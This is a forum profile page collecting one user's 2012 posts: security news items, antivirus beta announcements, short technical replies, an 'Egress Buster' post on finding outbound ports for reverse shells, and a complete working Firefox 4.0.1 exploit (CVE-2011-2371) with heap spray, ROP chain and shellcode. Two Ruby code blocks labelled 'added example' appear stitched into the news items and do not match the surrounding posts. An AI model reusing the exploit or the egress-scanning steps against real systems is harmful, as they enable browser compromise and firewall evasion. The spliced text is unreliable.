Nytro (Administrators)
Posts: 18725
Days Won: 706

Everything posted by Nytro

  1. THOR : Another P2P Botnet in development with extra stealth features POSTED BY THN REPORTER ON 3/06/2012 07:59:00 PM The research community is now focusing on the integration of peer-to-peer (P2P) concepts as incremental improvements to distributed malicious software networks (now generically referred to as botnets). Because "botnets" can be used for illicit financial gain, they have become quite popular in recent Internet attacks. A "botnet" is a network of computers that are compromised and controlled by an attacker. Each computer is infected with a malicious program called a "bot", which actively communicates with other bots in the botnet or with several "bot controllers" to receive commands from the botnet owner. Attackers maintain complete control of their botnets, and can conduct Distributed Denial-of-Service (DDoS) attacks, email spamming, keylogging, abusing online advertisements, spreading new malware, etc. However, the first botnets that use peer-to-peer (P2P) networks for remote control of the compromised machines appeared in the wild recently. This new bot has a different code base; it uses the same spreading strategy and also seems to maintain a multi-relay (or peer-to-peer) infrastructure just like its predecessor. Thor is a decentralised P2P botnet, coded in C/C++ and developed by "TheGrimReap3r", that has been in development for some time now and is almost ready to go on sale. The botnet itself has no central command point, so it will be very difficult to shut down, and also very difficult to track where commands are coming from, because all the nodes pass them on. Thor uses DLL injection, IAT hooking and a ring3 rootkit, amongst other things, to hide. One more interesting feature: it has its own module system, so you can write your own modules with "our easy API system". Its peer-to-peer communication uses 256-bit AES encryption with random key generation at each startup.
Thor works on Win 2000+, Win XP SP0/SP1/SP2/SP3, Win Vista SP0/SP1/SP2 and Win 7 SP0/SP1, and supports x86 and x64 systems. The developers of Thor are going to sell this botnet openly on the underground market and on various hacking forums at $8000 for the package without modules; the expected modules that anyone can buy will be: advanced botkiller, DDoS, formgrabber, keylogger/password stealer and mass mailer. Source: THOR : Another P2P Botnet in development with extra stealth features | The Hacker News (THN)
  2. I think it can be used with sysenter (if you get access to the stack) from user mode to obtain kernel-mode privileges.
  3. GitHub hacked with Ruby on Rails public key vulnerability Posted by THN Reporter On 3/06/2012 07:07:00 AM Github, the service that many professional programmers use to store their work and collaborate on coding, was hacked over the weekend. A young Russian developer, Egor Homakov, exploited a gaping vulnerability in GitHub that allowed him (or anyone else with basic hacker know-how) to gain administrator access to projects such as Ruby on Rails, Linux, and millions of others. When Github saw what happened, they suspended Homakov's account, which created a firestorm of protest, including a blog post entitled "Github, You Have Let Us All Down". Github has succumbed to a public key vulnerability in Ruby on Rails allowing a user administrator access to the popular Rails Git. Homakov's actions were relatively simple: he merely uploaded his public key to the repository so Git thought he was an approved administrator of that project. This would not only entitle Homakov to commit files, but he could effectively wipe the entire project and its history clean. "The root cause of the vulnerability was a failure to properly check incoming form parameters, a problem known as the mass-assignment vulnerability," GitHub co-founder Tom Preston-Werner wrote in a blog post. "Two days ago he responsibly disclosed a security vulnerability to us and we worked with him to fix it in a timely fashion. Today, he found and exploited the public key form update vulnerability without responsible disclosure," Preston-Werner said, explaining that this had meant Homakov had broken GitHub's terms and conditions. Github is used by a number of high-profile projects including the Linux kernel. Homakov's actions exploited a well-known weakness of Ruby on Rails, and questions might be asked as to why Github's administrators did not block such an attack sooner.
Moving forward, GitHub has apologized for obfuscating how white hat hackers should disclose security vulnerabilities and set up a new help page that clearly lists how to report issues. Source: GitHub hacked with Ruby on Rails public key vulnerability | The Hacker News (THN)
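The mass-assignment problem the article quotes Preston-Werner on is easy to see in a few lines. The following is an added example, not GitHub's or Rails' code: it models a public-key record in plain Ruby (no Rails needed), writes a tampered form submission through an unprotected update in the style of ActiveRecord's `update_attributes(params[...])`, and then through an allowlisted update in the spirit of `attr_accessible` / strong parameters. The record fields, the `user_id` value and the key strings are constructed for the demonstration.

```ruby
# Added example (not GitHub's or Rails' code): the mass-assignment pattern the
# article describes, modelled in plain Ruby so it runs without Rails.
# A public-key record belongs to a user; the form is only meant to let the
# owner change the key text and its title.

class PublicKey
  attr_accessor :user_id, :title, :key

  def initialize(user_id:, title:, key:)
    @user_id = user_id
    @title = title
    @key = key
  end

  # Mirrors update_attributes(params[:public_key]) on an unprotected model:
  # every submitted field is written straight to the record.
  def update_all_attributes!(params)
    params.each do |name, value|
      setter = "#{name}="
      raise ArgumentError, "unknown attribute #{name}" unless respond_to?(setter)
      public_send(setter, value)
    end
    self
  end

  # Hardened form: only an explicit allowlist of fields may come from the
  # request (the idea behind attr_accessible / strong parameters).
  PERMITTED = %w[title key].freeze

  def update_permitted!(params)
    rejected = params.keys.map(&:to_s) - PERMITTED
    params.each do |name, value|
      next unless PERMITTED.include?(name.to_s)
      public_send("#{name}=", value)
    end
    rejected # report what was dropped so the controller can log it
  end
end

# Constructed request: a user editing their own key, but also sending a
# user_id field that the form never offered.
TAMPERED_PARAMS = {
  "title" => "laptop",
  "key" => "ssh-rsa AAAA... submitted",
  "user_id" => 1
}.freeze

# Unprotected path: returns the user_id after the update (becomes 1, i.e. the
# key is now attached to a different account than the one that owned it).
def vulnerable_update(owner_id)
  rec = PublicKey.new(user_id: owner_id, title: "old", key: "ssh-rsa AAAA... owner")
  rec.update_all_attributes!(TAMPERED_PARAMS)
  rec.user_id
end

# Allowlisted path: returns [user_id after update, dropped field names].
def hardened_update(owner_id)
  rec = PublicKey.new(user_id: owner_id, title: "old", key: "ssh-rsa AAAA... owner")
  dropped = rec.update_permitted!(TAMPERED_PARAMS)
  [rec.user_id, dropped]
end

if __FILE__ == $PROGRAM_NAME
  puts "unprotected: user_id became #{vulnerable_update(42)}"
  owner, dropped = hardened_update(42)
  puts "hardened: user_id stayed #{owner}, dropped #{dropped.inspect}"
end
```

The detection-side lesson is in the return value of `update_permitted!`: a request carrying fields the form never rendered is worth logging, because it is exactly what a probe for this bug class looks like.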
  4. [h=1]Avira Free Mac Security Beta – Free antivirus for Mac aimed at companies and home users[/h] By Radu FaraVirusi(com) on March 5, 2012 Avira is launching the Beta version of its security product for Mac OS systems. It is called Avira Free Mac Security and will be offered free of charge both to companies and to home users. To download Avira Free Mac Security BETA, go to: http://betacenter.avira.com/files/download.aspx/avira_mac_security_1.0.0.50-2.pkg For other details about the product, see the Avira blog: Avira Free Mac Security – Beta now available | Avira – TechBlog Source: Avira Free Mac Security Beta – Free antivirus for Mac aimed at companies and home users
  5. [h=1]Download Kaspersky Internet Security 2013 – Beta testing has begun[/h] By Radu FaraVirusi(com) on March 5, 2012 Kaspersky has released version 2013 of its well-known security product, Kaspersky Internet Security. For now it is in BETA testing and there is no official list of changes yet. The graphical interface has stayed, and will stay until the final release, the same as in version 2012, with small changes in "shade". Below are the first screenshots and, at the end, the download links: To download Kaspersky Internet Security 2013 Beta, go to: http://special.kaspersky-labs.com/3A8VCJNYOJN7JYU8HFUW/kis13.0.0.2292en.exe To report problems encountered during the evaluation, or for other information, you can visit the official forum: Kaspersky Lab Forum -> KIS\KAV 2013 Source: Download Kaspersky Internet Security 2013 – Beta testing has begun
  6. Javascript != Node.js...
  7. ICMP, TCP, UDP, it's irrelevant. The problem is simple: how do you make a connection FROM THE BROWSER using a given protocol, whichever it is? As for ICMP, it has other purposes, not to mention that a raw socket is needed to create it (I know you know this), which means running the "program" as Administrator/root. Then, these days, Internet connections often do not have a UNIQUE public IP address, and I don't think port forwarding on ISP routers is an option either. In short, the browser is not made for this. The only possible solution might be The WebSocket API, but I don't know how you would manage to put a WebSocket into a "listening" state.
  8. It can't be done.
  9. Hi, there's nothing you can do; it only works if the form (the page in the iframe) is on the same server. This is a limitation imposed since the Netscape days, many years ago. Let's be serious: if this were possible, a lot of "things" could be done. Or, something can be done, of course, if you have an XSS in that site.
  10. Too bad they are session cookies (with no "expire"). You know what those are and how long they are valid.
  11. It's sloppily written, a pile of junk, not exactly a source you can learn from. PS: Linux on 64 bits?
  12. Also explain what the differences are between "union" and "union all", between "into outfile" and "into dumpfile", how you check privileges, what you do if the directory is not writeable or you don't have the direct path, why that "+" is at the end and what it means to the browser, why you use hex for Load File when the PHP code shows the quote is not escaped, what can be done if the system function is in the "disabled_functions" list and... why do you use Internet Explorer?
  13. 1. Remote Desktop Protocol - Wikipedia, the free encyclopedia
2. See the link at step 1; the question is irrational, RDP is a protocol
3. Simple Mail Transfer Protocol - Wikipedia, the free encyclopedia
4. I think you mean SMTP Server, a server that implements the SMTP PROTOCOL
5. You can send emails
PS: I answered your questions; for those who deal with this kind of thing, these terms have other connotations. Don't expect relevant answers from those people; I can swear there aren't 2-3 people here who have read about the SMTP or RDP protocol. They just use some lame programs and don't understand how the protocol itself works; it's like walking into an apartment block and trying a few keys on certain doors. It doesn't matter that you don't know how that door works, you just try, and if you're lucky you can brag (though there's nothing to brag about) that you're a "hacker" and that you've broken into servers (I say this because the same principles apply to SSH, which, yes, is also a protocol). NB: Communications protocol - Wikipedia, the free encyclopedia Be one of those people who knows the locking mechanism of a door, if you really want to be a... "door opener".
  14. Crappy translation, "seized" means "confiscated" in German.
  15. [h=1]Loophole in iOS Allows Developers Access to Users' Photos[/h]February 29, 2012, 2:29PM by Christopher Brook A recently discovered hole in Apple's iOS allows third-party developers access to users' iPhone, iPad or iPod Touch photos by exploiting the device's location data, according to a report from the New York Times' Nick Bilton on the Bits blog yesterday. The loophole lies in the way that applications use certain photo location data. Assuming an iPhone user approves any app that accesses the location data of photos, the app's developers will be able to capture any of the user's images while that app is open. The Times had an unnamed developer create a proof-of-concept app to do just this, according to the blog post. The app, called PhotoSpy, was never submitted to the App Store for approval but asked users for access to location data. After the user granted it, the app began transferring photos and location data from the phone to a remote server. Apple first allowed apps access to photo libraries in 2010 with the fourth build of their operating system. The move was intended to allow photo apps better access to let users share and edit photos. While Apple didn't immediately respond to a request for comment on Wednesday, they have gone on record regarding any apps that may use a user's contact information without notification: "Apps that collect or transmit a user's contact data without their prior permission are in violation of our guidelines," Apple's Tom Neumayr told the Wall Street Journal's AllThingsD blog earlier this month. The news comes two weeks after it was discovered that Twitter and other apps were uploading users' contact lists to remote servers without their knowledge. Path, a social network that encourages users to share photos and message each other, was criticized earlier this month after a researcher found the company's app uploading users' address books to the company without notification.
Source: Loophole in iOS Allows Developers Access to Users' Photos | threatpost
  16. A walk through the expo at RSA Conference 2012, part two Posted on 29 February 2012. The expo floor at this year's RSA Conference is bigger than ever, with numerous companies exhibiting for the first time. Here's another look at the show floor, with more interesting booths. For up-to-date conference news and photos check out our dedicated coverage page for RSA Conference 2012. (Photo captions:) The extensive EMC booth dominates one of the rows. Sensage in the middle of a discussion. Presentation in progress at the Wave Safend booth. The Tenable Security space. FireHost briefing potential customers. The busy Arbor Networks booth. Something grabbed this gentleman's attention. The Check Point booth. Source: A walk through the expo at RSA Conference 2012, part two
  17. [h=1]Roboscan Internet Security – Free security suite with a dual engine: BitDefender and Tera[/h] By Radu FaraVirusi(com) on February 29, 2012 A new free security suite is appearing on the market: Roboscan Internet Security Free. For the Antivirus component it uses two engines, BitDefender and Tera, so you can have top protection against malware of any kind, together with a decent firewall. At first impression it has a very low resource consumption, 18 MB RAM, and the detection is very good. It is therefore a serious competitor for the other free security products already on the market. Below are a few screenshots, followed by the download link. To download it, go to: Roboscan Source: Roboscan Internet Security – Free security suite with a dual engine: BitDefender and Tera
  18. [h=4]Hitb2011Kul - Mobile Malware Analysis[/h] Description: Mobile Malware Analysis Source: Hitb2011Kul - Mobile Malware Analysis
  19. [h=4]Hitb2011Kul - Reverse Engineering Android Malware[/h] Description: Reverse Engineering Android Malware Android is growing at such an explosive rate, and users are storing an increasing amount of important data on their mobile phones, that the platform is an attractive target for malware authors. Malware authors are aiming at users of Google's Android mobile operating system with malicious applications that harvest personal information, control the system and send it to a remote server. By utilizing SMS toll fraud, malware authors will also steal money from infected mobile phones. Malware infection on the Android platform is going to be interesting in the future (it's happening now!). Thus, reversing Android malware (Droid-ware) is an interesting challenge to address. Malware analysis can be performed using two approaches: Dynamic Analysis and Dead-Listing Analysis (Reverse Engineering). Reverse engineering is a vitally important skill for today's expert security professional. In this presentation, we'll focus on the latter approach to analyze Android malware. In this talk, the speaker will discuss recent progress on the Android malware scene. The speaker will provide details on a few recent Android malware samples. The speaker will also discuss the technical analysis of malicious Android applications using a reverse engineering approach. The analysis parts will focus on dissecting obfuscation such as encryption, string optimizing and generic obfuscation techniques applied inside Android malware. The challenges when reversing Android malware will be addressed as well. About Mahmud Ab Rahman Mahmud Ab Rahman currently works as Information Security Specialist for the Malaysia Computer Emergency and Response Team (MyCERT) under the umbrella of CyberSecurity Malaysia. Prior to that, he worked as an Intrusion Analyst at the MyCERT department. His education background comprises a Master's Degree in Computer Science from the National University of Malaysia in 2006.
Prior to that, he obtained a Degree in Computer Science from the same university. Mahmud has been involved in the computer security field for over 5 years. His areas of focus and interest are network security, honeynets, botnet monitoring, and malware analysis. He also engages in several large-scale penetration-testing exercises and provides solutions for any vulnerability detected. Moreover, he is recognized for conducting a number of trainings for organizations on topics ranging from introductory to advanced security courses. He is an occasional speaker at conferences such as FIRST AGM, FIRST TC, Honeynet Annual Workshop and Infosec.MY. He is currently certified for SANS's GPEN (gold) and GREM. Source: Hitb2011Kul - Reverse Engineering Android Malware
  20. [h=1]First beta for GNOME 3.4[/h]27 February 2012, 12:19 The GNOME project has released the first beta of GNOME 3.4, officially labelled GNOME 3.3.90 beta. This marks the development of the desktop environment moving into the home stretch, and there should be no major changes from this point on because, among other things, the feature freeze was put in place a week ago. The first beta implements a range of improvements to the core components and applications that make up the GNOME desktop. For example, the updated version of NetworkManager includes basic support for VLANs and bonded network ports. The GNOME shell and screensaver now use systemd to obtain information on active users of the system and their input devices rather than, as at present, using ConsoleKit. The previously developed Redo function in Nautilus, the streamlined web browser, and the new virtualisation and remote desktop software, GNOME Boxes, are also part of the beta. According to the schedule, GNOME 3.4 is due for release on 28 March. Before then, another beta and a release candidate will appear. (djwm) Source: First beta for GNOME 3.4 - The H Open Source: News and Features
  21. [h=2]New tool release – "Egress Buster" – Find outbound ports[/h]February 29th, 2012 A friend was recently on a penetration test and needed a port on the outside. I haven't found any decent tools out there for finding what ports are allowed outbound to help with reverse shells and stuff like that, so I wrote one real quick. Note that this was written in about 15 minutes and the code can absolutely be improved. I'll probably go back and clean it up sometime. There are some limitations; for one, operating systems in general start to puke when you generate over a 1000 listeners, so you will need to test a 1000 at a time. Good news is the socket handlers are multi-threaded so you can cycle through about a 1000 ports in well under a minute. Here's the general concept: You are on the inside network somehow and need to find what ports are allowed out to the Internet. There's two main files/components – egressbuster and egress_listener. Egressbuster connects out on whatever ports you specify and tries to connect to an Internet-facing computer that's running egress_listener. Very simple to run:
On victim: egressbuster.exe
example: egressbuster.exe 208.1.1.1 1-1000
In the above example, we specify a low port range and high port range; egressbuster will attempt to connect from port 1 to 1000 outbound to wherever the reverse_listener is.
The listener: python egress_listener.py
example: python egress_listener.py 1-1000
In the above example, we just specify what ranges we need to listen to: we listen from 1 to 1000 for incoming connections. When a connection is established, this is what you'll see on the listener side.
192.168.235.131 connected on port: 170
192.168.235.131 connected on port: 171
192.168.235.131 connected on port: 172
192.168.235.131 connected on port: 173
192.168.235.131 connected on port: 174
192.168.235.131 connected on port: 175
192.168.235.131 connected on port: 176
192.168.235.131 connected on port: 177
192.168.235.131 connected on port: 178
If you're interested, download the byte-compiled code and the python source here. Download: https://www.secmaniac.com/files/egressbuster.zip Source: https://www.secmaniac.com/blog/2012/02/29/new-tool-release-egress-buster-find-outbound-ports/
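The listener output above is one line per successful outbound connection, which is hard to read once a test covers a thousand ports. The following is an added example, not part of the Egress Buster tool: it parses lines in that exact `<ip> connected on port: <n>` format, discards anything else, and collapses each source host's ports into inclusive ranges, which is the summary a firewall owner wants when checking how far the real egress policy differs from the intended one. The sample lines are constructed (the 170..178 run is the one shown in the post; the 443, 8080 and 10.0.0.7 entries are made up).

```ruby
# Added example (not part of Egress Buster): summarize listener output into
# per-host port ranges for an egress-policy review.

LINE_RE = /\A(\d{1,3}(?:\.\d{1,3}){3}) connected on port: (\d+)\z/

# Parse listener lines into { ip => sorted unique port list }; lines that do
# not match the listener's format (banners, blanks) are ignored.
def parse_egress(lines)
  seen = Hash.new { |h, k| h[k] = [] }
  lines.each do |line|
    m = LINE_RE.match(line.strip)
    next unless m
    port = m[2].to_i
    next unless (1..65_535).cover?(port)
    seen[m[1]] << port
  end
  seen.transform_values { |ports| ports.uniq.sort }
end

# Collapse a sorted list of ports into inclusive [lo, hi] ranges.
def to_ranges(ports)
  ports.each_with_object([]) do |p, ranges|
    if ranges.any? && ranges.last[1] + 1 == p
      ranges.last[1] = p
    else
      ranges << [p, p]
    end
  end
end

# { ip => [[lo, hi], ...] } for every host that got out.
def summarize_egress(lines)
  parse_egress(lines).transform_values { |ports| to_ranges(ports) }
end

# Constructed sample in the listener's output format, plus a noise line and a
# duplicate connection (a retried port must not appear twice).
SAMPLE = [
  *(170..178).map { |p| "192.168.235.131 connected on port: #{p}" },
  "192.168.235.131 connected on port: 443",
  "192.168.235.131 connected on port: 443",
  "10.0.0.7 connected on port: 8080",
  "listener started"
].freeze

if __FILE__ == $PROGRAM_NAME
  summarize_egress(SAMPLE).each do |ip, ranges|
    pretty = ranges.map { |lo, hi| lo == hi ? lo.to_s : "#{lo}-#{hi}" }
    puts "#{ip}: #{pretty.join(', ')}"
  end
end
```

Feed it the saved listener log (`ruby egress_summary.rb < listener.log` after changing the `SAMPLE` constant to read `$stdin.readlines`) and compare the resulting ranges against the firewall's outbound rule set; any range that is open but not in the rule set is a policy gap to close.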
  22. Metasploit - Low Level View Saad Talaat (saadtalaat _ gmail.com) Forward Abstract: for the past decade (almost) Metasploit has been the number one pentesting tool. A lot of plug-ins have been developed specially for it. However, the key point of this paper is to discuss the Metasploit framework as a code injector and payload encoder. Another key point of this paper is the different forms of malware and how to avoid anti-viruses, which have been a pain for pentesters lately, and how exactly anti-malware software works. Introduction Evading anti-viruses has been a painful issue for pentesters for years. On the other hand, the birth of an anti-virus evading technique means blackhats and skiddies will have another way to hack without being detected. Over the years the Metasploit framework has been working on one technique for evading anti-viruses, which is encoding. For a year or two some encoding techniques worked fine. Nowadays it's nearly impossible to get an encoded payload that evades anti-virus from Metasploit's encoders, no matter how many iterations you do. Download: [URL]http://cdn01.exploit-db.com/wp-content/themes/exploit/docs/18532.pdf[/URL]
  23. Mozilla Firefox Firefox 4.0.1 Array.reduceRight() Exploit
<!--
Full Exploit Code: http://www.exploit-db.com/sploits/18531.zip
PoC exploit for CVE-2011-2371
tested against Firefox 4.0.1
md5 of mozjs.dll: 5d7ffcc9deb5bb08417ceae51d2afed4
change constants to switch between w7/xp.
see my blog if you want to know how this works.
http://gdtr.wordpress.com/2012/02/22/exploiting-cve-2011-2371-without-non-aslr-modules/
p_k
twitter.com/pa_kt
gdtr.wordpress.com
-->
<html>
<script src="jspack.js"></script>
<script>
function hex(x){
    var y = x.toString(16);
    y = "0x"+y;
    return y;
}
function itoa(i) {
    return String.fromCharCode(i);
}
// n - length in bytes (1 unicode char = 2 bytes)
function puff(x, n){
    while(x.length < n)
        x += x;
    return x.substring(0,n);
}
function arr2hex(tab){
    var s = "";
    for(var i in tab){
        x = tab[i];
        x = x.toString(16);
        if(x.length<2)
            x = "0"+x;
        s += x + " ";
    }
    return s;
}
function arr2ascii(tab){
    var s = ""
    for(var i in tab){
        x = tab[i];
        if(0x20 <= x && x<=0x7f){
            y = itoa(x);
        }
        else{
            y = ".";
        }
        s += y;
    }
    return s;
}
function xchg(d,i,j){
    t = d[i];
    d[i] = d[j];
    d[j] = t;
}
function bswap(d){
    xchg(d, 0, 3);
    xchg(d, 1, 2);
}
function nicer(tab){
    jsp = new JSPack();
    res = [];
    for(var i in tab){
        x = tab[i];
        t = jsp.Pack("d", [x]);
        d1 = t.slice(0, 4);
        d2 = t.slice(4, 8);
        bswap(d1);
        bswap(d2);
        t = [d1,d2];
        res = res.concat(t);
    }
    res = res.reverse();
    return res;
}
function dw2int(d){
    n = 0;
    for(var i=0;i<4;i++){
        n *= 256;
        n += d[3-i];
    }
    return n;
}
function convert(tab){
    o = s = v = "";
    for(var i in tab){
        d = tab[i];
        s += arr2hex(d);
        v += arr2ascii(d);
        if((parseInt(i)+1)%4==0){
            o += s + " | " + v + "\n";
            s = "";
            v = "";
        }
    }
    return o;
}
function check_pair(d1, d2){
    var n1 = dw2int(d1);
    var n2 = dw2int(d2);
    if(n2-n1 == 0x304)
        return true;
    return false;
}
function find_mozjs_base(tab){
    var n1 = 0;
    for(var i=0;i<tab.length-4;i++){
        d1 = tab[i];
        d2 = tab[i+1];
        if(check_pair(d1,d2)){
            n1 = dw2int(d1);
            n1 = n1 - 0x3cac;   //n1 = mozjs .data
            n1 = n1 - 0x1B2000; //n1 = mozjs base
            break;
        }
    }
    return n1;
}
function d2u(dword){
    var uni = String.fromCharCode(dword & 0xFFFF);
    uni += String.fromCharCode(dword>>16);
    return uni;
}
function odd_d2u(d1, d2){
    uni = String.fromCharCode((d1&0xFF)<<8);
    uni += String.fromCharCode((d1>>8)&0xFFFF);
    uni += String.fromCharCode((d1>>24)+((d2 & 0xFF)<<8)); //1+1<<8 == 512 in JS T_T
    uni += String.fromCharCode((d2>>8)&0xFFFF);
    uni += String.fromCharCode(d2>>24);
    return uni;
}
// generated with mona.py
function rop_chain(mozjs_base){
    var arr = [
        mozjs_base + 0x000c96e6, // POP EAX // RETN [mozjs.dll]
        mozjs_base + 0x0015d054, // ptr to &VirtualAlloc() [IAT mozjs.dll]
        mozjs_base + 0x00028510, // MOV EAX,DWORD PTR DS:[EAX] // RETN [mozjs.dll]
        mozjs_base + 0x0014293c, // XCHG EAX,ESI // RETN [mozjs.dll]
        mozjs_base + 0x0014d00d, // POP EBP // RETN [mozjs.dll]
        mozjs_base + 0x000d7ee2, // & push esp // ret 04 [mozjs.dll]
        mozjs_base + 0x000be327, // POP EBX // RETN [mozjs.dll]
        0x00000001,              // 0x00000001-> ebx
        mozjs_base + 0x0004f422, // POP EDX // RETN [mozjs.dll]
        0x00001000,              // 0x00001000-> edx
        mozjs_base + 0x000b1421, // POP ECX // RETN [mozjs.dll]
        0x00000040,              // 0x00000040-> ecx
        mozjs_base + 0x000062e3, // POP EDI // RETN [mozjs.dll]
        mozjs_base + 0x0000f005, // RETN (ROP NOP) [mozjs.dll]
        mozjs_base + 0x000652f0, // POP EAX // RETN [mozjs.dll]
        0x90909090,              // nop
        mozjs_base + 0x001372bd  // PUSHAD // RETN [mozjs.dll]
    ];
    return arr;
}
function tab2uni(tab){
    var uni = ""
    for(var i=0;i<tab.length;i++){
        uni += d2u(tab[i]);
    }
    return uni;
}
function spray(mozjs_base, h1_s, hsize) {
    function rva2va(addr) { return addr+mozjs_base; }
    function rva2d(addr) { return d2u(rva2va(addr)); }
    var align = 0x100000;
    var tab_offset = 0x1000;
    var TYPE_OBJECT = "%u0007%uffff";
    var pivot_rva = 0x1a21c; // 0x68e7a21c : # ADD EBP,EBX # PUSH DS # POP EDI # POP ESI # POP EBX # MOV ESP,EBP # POP EBP # RETN
    var mov_esp_ebp_rva = 0x1a222; // mov esp, ebp # pop ebp # ret
    var h2_s = h1_s + hsize;
    var h2_middle = (h2_s + hsize/2) & (~(align-1)); //align
    //mov eax,dword ptr [edi+64h] ;edi=[h2_ptr+4], later: call eax
    var h2_ptr = h2_middle + tab_offset;
    var off1 = h2_ptr;
    var off2 = h2_ptr-0x64;
    var v1 = d2u(off1);
    var h1_fill = unescape(v1+TYPE_OBJECT);
    var foo = puff(h1_fill, 0x4000);
    var h1_spray = foo.substring(0,(0x4000/2)-2);
    var pivot_va = rva2va(pivot_rva);
    pivot_va = d2u(pivot_va);
    off2 = d2u(off2);
    var new_ebp = h2_ptr+18;
    var mov_esp_ebp_va = rva2va(mov_esp_ebp_rva);
    var set_esp = odd_d2u(new_ebp, mov_esp_ebp_va);
    var rop = tab2uni(rop_chain(mozjs_base));
    //shellcode by skylined
    var msgbox_shellcode = "%uf631%u6456%u768b%u8b30%u0c76%u768b%u8b1c%u086e%u368b%u5d8b%u8b3c%u1d5c%u0178%u8beb%u184b%ue367%u8bec%u207b%uef01%u7c8b%ufc8f%uef01%uc031%u3299%u6617%ucac1%uae01%uf775%u8166%u2afa%u74b6%u6609%ufa81%u1aaa%udbe0%uc575%u538b%u0124%u0fea%u14b7%u8b4a%u1c7b%uef01%u2c03%u8597%u74f6%u6812%u3233%u2020%u7568%u6573%u5472%ud5ff%u3195%uebf6%u56a3%u3168%u0021%u6800%u322d%u3733%u3268%u3130%u6831%u7663%u2d65%u8754%u2404%u5050%uff56%uccd5";
    var x = unescape(pivot_va+off2+set_esp+"%u1111%u2222"+rop+msgbox_shellcode);
    x = puff(x, 0x4000);
    var h2_spray = x.substring(0,(0x4000/2)-2);
    var spray_tab = new Array();
    for (i=0;i<0x1000;i++){
        spray_tab[i] = h1_spray+"1";
        spray_tab[i].indexOf("zzz");
    }
    for (i=0x1000;i<0x2000;i++){
        spray_tab[i] = h2_spray+"2";
        spray_tab[i].indexOf("zzz");
    }
}
var exploit_func = function bleh(prev, current, index, array) {
    //boom = typeof current;
    current[4] = 1; // add ebp, ebx, where ebx=2*4+1=9
    //throw "up";
}
function trigger(func, arr_len){
    xyz.length = arr_len;
    try{
        xyz.reduceRight(func,1,2,3);
    }
    catch(e){
    }
}
function leak(){
    var CHUNK_SIZE = 0x1000;
    var leak_arr_len = 0xffffffff;
    mem = [];
    count = 0;
    var leak_func = function bleh(prev, current, index, array) {
        if(typeof current == "number"){
            mem.push(current);
        }
        count += 1;
        if(count>=CHUNK_SIZE/8){
            throw "lol";
        }
    }
    function dump_mem(leak_f, arr_len){
        var dump = document.getElementById("dump");
        var mozjs_base = 0;
        for(var i=0;;i++){
            mem = [];
            count = 0;
            trigger(leak_f, arr_len);
            mem = nicer(mem);
            s = convert(mem);
            dump.innerHTML = s;
            //alert("leaked bytes: "+hex(mem.length*4));
            mozjs_base = find_mozjs_base(mem);
            //alert("mozjs base: "+hex(mozjs_base));
            if(mozjs_base != 0){
                break;
            }
        }
        return mozjs_base;
    }
    var base = dump_mem(leak_func, leak_arr_len);
    return base;
}
function go(){
    //var arr_ptr = 0x05000000; //(xp sp3)
    //var h1_s = 0x05b00000;
    //var h2_e = 0x0fb00000;
    var arr_ptr = 0x0b000000; //w7
    var h1_s = 0x0b500000;
    var h2_e = 0x16e00000;
    var size = h2_e-h1_s;
    var hsize = size/2;
    var h1_middle = h1_s+hsize/2;
    var exp_arr_len = (h1_middle - arr_ptr)/8 + 0x80000000;
    var mozjs_base = leak();
    spray(mozjs_base, h1_s, hsize);
    alert("ready");
    while(1){
        trigger(exploit_func, exp_arr_len);
        exp_arr_len -= 0x500;
    }
}
// globals
var xyz = new Array();
</script>
<body>
<input type="button" value="go" onclick="go()" />
<pre id="dump">
</pre>
</body>
</html>
Source: Mozilla Firefox Firefox 4.0.1 Array.reduceRight() Exploit